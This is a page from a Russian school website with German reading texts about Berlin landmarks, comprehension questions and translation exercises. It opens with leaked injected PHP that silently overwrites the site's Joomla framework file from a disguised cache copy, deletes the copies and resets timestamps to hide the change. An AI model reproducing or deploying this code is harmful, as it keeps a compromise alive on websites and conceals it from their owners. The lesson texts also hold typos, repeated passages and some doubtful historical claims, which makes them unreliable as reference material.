$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Тексты к урокам немецкого языка

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210406

На сайте

Сейчас 33 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Тексты к урокам немецкого языка

Berlin ist die Hauptstadt Deutschlands, sein politisches, wissenschaftliches und kulturelles Zentrum. Das ist die gröβte Stadt des Landes, hier wohnen 3,5 Millionen Menschen.Die Hauptstadt Deutschlands liegt an der Spree. Ihre schönen Landschaften, Seen, Kanäle, Parks, Wälder bewundern viele Touristen. Berlin hat eine sehr alte Geschichte. Es entstand im 13. Jahrhundert aus zwei Fischerdörfern Berlin und Cölln. 1871 wurde es zur Hauptstadt des Deutschen Reiches. Nach der Niederlage des deutschen Faschismus wurde die Stadt Berlin 1948 in zwei Teile geteilt. Das waren Westberlin und Ostberlin. 1989 fiel die Berliner Mauer, die beide Teile Berlins achtundzwanzig Jahre voneinander trennte. Heute ist Berlin wieder die Hauptstadt des einheitlichen Deutschen Staates.

 

Fragen zum Text:

 

1. Wo liegt Berlin?

 

2. Wie ist die Einwohnerzahl der Stadt Berlin?

 

3. Wann wurde Berlin gegründet?

 

4. Wann wurde Berlin zur Hauptstadt des Deutschen Reiches?

 

5. Seit wann wurde Berlin in zwei Teile geteilt?

 

 

 

Das Wahrzeichen Berlins – das Brandenburger Tor – wurde in den Jahren 1788-1791 als ein Tor des Friedens geschaften. Während des zweiten Weltkrieges wurde das Tor stark zerstört. Jetzt ist das Brandenburger Tor wiederherstellt worden.

 

Fragen zum Text:

 

1. Was ist das Wahrzeichen Berlins?

 

2. Wann wurde das Brandenburger Tor errichtet?

 

3. Was geschah mit dem Tor während des zweiten Weltkrieges?

 

 

4. Wann wurde Berlin zur Hauptstadt des Deutschen Reiches?

5. Seit wann wurde Berlin in zwei Teile geteilt?

 

6. Wann wurden die beiden Deutschen Staaten vereinigt?

 

 

 

Eine der schönsten Straßen Berlins heißt Unter den Linden. In dieser Straße liegen viele Botschaften, Geschäfte, Cafes, Restaurants, das Gebäude der ältesten Universität Berlins, der Humbold-Universität, die Staatsbibliothek und Museen.

 

Fragen zum Text:

 

1. Wie heißt eine der schönsten Straßen Berlins?

 

2. Was befindet sich in dieser Straße?

 

 

 

Einer der beliebtesten Plätze Berlins ist der Alexanderplatz. Der Berliner nennen ihn liebevoll “Alex”. Der Alexanderplatz bekam seinen Namen dem russischen Zaren Alexander dem Ersten zu Ehren. Hier befinden sich auch der Berliner Fernsehturm, der Brunnen der Völkerfreundschaft und die Weltzeituhr.

 

Fragen zum Text:

 

1. Wie nennen die Berliner den Alexanderplatz?

 

2. Wem zu Ehren bekam dieser Platz seinen Namen?

 

3. Was befindet sich noch auf dem Alexanderplatz?


Der Flughafen Tegel wurde 1975 als Nachfolger des legendären Flughafens Tempelhof Westberlins geöffnet. In dem 6-eckigen Haußtgebäude können bis zu 2500 Fluggäste stündlich abgefertigt warden.

Fragen zum Text:

1. Wie heißt der Flughafen im Zentrum Berlins?

2. Wann wurde er geöffnet?

3. Wieviel Fluggäste können hier stündlich abgefertigt werden?

Der Flughafen Tegel wurde 1975 als Nachfolger des legendären Flughafens Tempelhof Westberlins geöffnet. In dem 6-eckigen Haußtgebäude können bis zu 2500 Fluggäste stündlich abgefertigt warden.

Fragen zum Text:

 

1. Wie heißt der Flughafen im Zentrum Berlins?

 

2. Wann wurde er geöffnet?

 

3. Wieviel Fluggäste können hier stündlich abgefertigt werden?

 

 

Das schöne Elefantentor führt den Besucher in Deutschlands ältesten Zoo. Er wurde 1844 eröffnet. Das ist einer der größten Zoos Europas. Hier befindet sich auch das Aquarium. Im Berliner Zoo leben 15391 Tiere in 1168 Arten.

Fragen zum Text:

 

1. Wann wurde der Berliner Zoo eröffnet?

 

2. Wieviel Tiere leben in diesem Zoo?

 

Eine der lebhaftesten Straßen Berlins ist der Kurfürstendamm. Die Straße ist von Berlinern und Touristen sehr beliebt. In dieser Straße befinden sich zahlreiche Geschäfte, Restaurants, Cafes, Theaters und Kinos.

Fragen zum Text:

 

1. Wie heißt die größte Geschäftsstraße Berlins?

 

2. Was befindet sich in dieser Straße?

 

 

Der Kurfürstendamm beginnt an der Kaiser Wilhelm Gedächtniskirche. Diese Kirche wurde im zweiten Weltkrieg fast zerstört. Nach dem Krieg wurde sie im modernen Stil wiedeaufgebaut. Ihr halb zerstörter Turm blieb erhalten, um an die Folgen des Krieges zu mahnen. Hinter der Kirche ist ein Platz, ein Treffpunkt vieler Berliner Jugendlichen.Hier sitzen und stehen Jungen und Mädchen. Einige gruppieren sich um Straβenmusiker mit Gitarren oder elektronischen Musikinstrumenten. Manche laufen Inline-Skates, diskutieren laut und trinken Bier. Straβenkünstler malen Porträts und Stadtbilder.

 

Fragen zum Text:

 

1. Wie sieht jetzt die Kaiser Wilhelm Gedächtniskirche aus?

 

2. Warum kann man hier viele Jugendlichen sehen?


Einer der schönsten Parks von Berlin heiβt der Tiergarten. Dort jagten früher die preussischen Könige, deshalb heiβt er Tiergarten.

Fragen zum Text:

1. Was ist der Teirgarten?

2. Warum heiβt dieser Park so?

 

In der Mitte des Tiergartens erhebt sich die 75 Meter hohe Siegessäule mit der 10 Meter hohen vergoldeten Göttin Viktoria. Sie wurde nach dem Deutsch-Französischen Krieg 1870-1871 errichtet. Auf der Siegessäule befindet sich ein Balkon, von da aus kann man den Tiergarten sehen.

Fragen zum Text:

1. Was kann man in der Mitte des Tiergartens sehen?

2. Wann wurde die Siegessäule errichtet?

Nicht weit von dem Tiergarten befindet sich das Gebäude des Reichtages. Früher war das Symbol des faschistischen Reiches. Dieses Gebäude wurde im Mai 1945 völlig zerstört. Jetzt wurde er zum neuen Wahrzeichen Berlins. Er wurde wieder zum Sitz des Deutschen Bundestages umgebaut.

Fragen zum Text:

1. Wo befindet sich der Reichstag?

2. Wie sah das Reichstagsgebäude während des Krieges aus?

  1. Was befindet sich jetzt in diesem Gebäude?

Berühmt sind die Museen Berlins. Das sind das Alte uns das Neue Museen, das Pergamonmuseum, die Nationalgalerie. Die drei letzten liegen auf der weltbekannten Museumsinsel.

Das Pergamonmuseum besitzt viele wertvolle sammlungen. Das Museum wurde gebaut nachdem die deutschen Archäologen (Schliemann und andere) nach ihren Ausgrabungen im Asien und Ägypten viele Schätze nach Deutschland brachten.

Fragen zum Text:

1. Welche Berliner Museen sind besonders berühmt?

2. Welche Museen liegen auf der Museumsinsel?

3. Wodurch ist das Pergamonmuseum bekannt?

Nicht weit vom Alexanderplatz liegt das Rote Rathaus, das mit seinem 97 hohen Turm auch zu den Wahrzeichen Berlins gehört. Auf 36 Terrakottareliefs kann man die Geschichte Berlins bis zum Jahre 1871 sehen. Vor dem Rathaus steht der Neptunbrunnen.

Fragen zum Text:

1. Wo liegt das RoteRathaus?

2. Was kann man auf 36 Terrakottareliefs des Roten Rathauses sehen?

Hinter dem Roten Rathaus liegt zur Spree hin das Nikolaiviertel, der älteste Stadtteil von Berlin. Die Nikolaikirche ist die älteste Kirche Berlins. Sie wurde 1230 erbaut und wurde nach der Zerstörung im zweiten Weltkrieg ganz neu wiederaufgebaut. Pünktlich zur 750-Jahr-Feier Berlins wurde das ganze Viertel rekonstruiert. Es sieht jetzt sehr schön aus. Hier befinden sich in den historisch rekonstruierten Bauten viele Läden und Gaststätten sowie Wohnungen. Dieses Viertel gehört zu den Sehenswürdigkeiten Berlins.

Fragen zum Text:

1. Was ist das Nikolaiviertel?

2. Wann wurde die Nikolaikirche erbaut?

3. Wann wurde das Nikolaiviertel reconstruiert?

4. Wie sieht das Nikolaiviertel aus?

Aufgaben zu den Texten

1. Findet in den Texten deutsche Äquivalente zu den folgenden russischen Sätzen.

1) Столица Германии лежит на реке Шпрее.

2) Он возник в 13 веке из двух рыбацких деревень Берлин и Кельн.

3) В 1948 году город Берлин был разделен на две части: Восточный и Западный Берлин.

4) В 1989 году пала Берлинская стена, которая в течение 28 лет разделяла обе части города друг от друга.

5) Символ Берлина – Бранденбургские ворота.

6) На этой улице расположены посольства, магазины, кафе, рестораны, здание старейшего университета Берлина, Гумбольдского университета, Государственная библиотека и музеи.

7) Одна из любимейших площадей Берлина – Александрплац.

8) В шестиугольном главном здании могут быть обслужены ежечасно до 2500 пассажиров.

9) Красивые ворота в форме слонов ведут посетителя в старейший зоопарк Германии.

10) Курфюрстендам начинается у церкви Памяти Кайзера Вильгельма.

11) За церковью находится площадь, место встречи Берлинской молодежи.

12) В центре Тиргартена возвышается 75-метровая колонна победы с 10-метровой позолоченной богиней Викторией.

13) Пергамский музей располагает многими ценными коллекциями.

14) Музей был построен после того, как немецкие археологи (Шлиман и другие), после раскопок в Азии и Египте, привезли много богатств в Германию.

15) На 36 терракотовых рельефах можно увидеть историю Берлина до 1871 года.

2. Setzt in die folgenden Sätze die unten angegebenen Wörter ein.

1) Berlin ist jetzt wieder ... des einheitlichen Deutschen Staates.

2) Das Wahrzeichen Berlins ist ... .

3) Eine der schönsten Straβen Berlins ist ... .

4) Den Alexanderplatz nennen die Berliner liebevoll ... .

5) Der Kurfürstendamm ist eine der ... Straβen Berlins.

6) In der Mitte ... erhebt sich die Siegessäule.

7) Die deutschen Archäologen brachten viele ... nach Deutschland.

8) Viele Touristen ... historische Kulturstätten Berlins.

Unter den Linden, Alex, das Branderburger Tor, die Hauptstadt, lebhaffesten, des Tiergartens, schätze, besichtigen.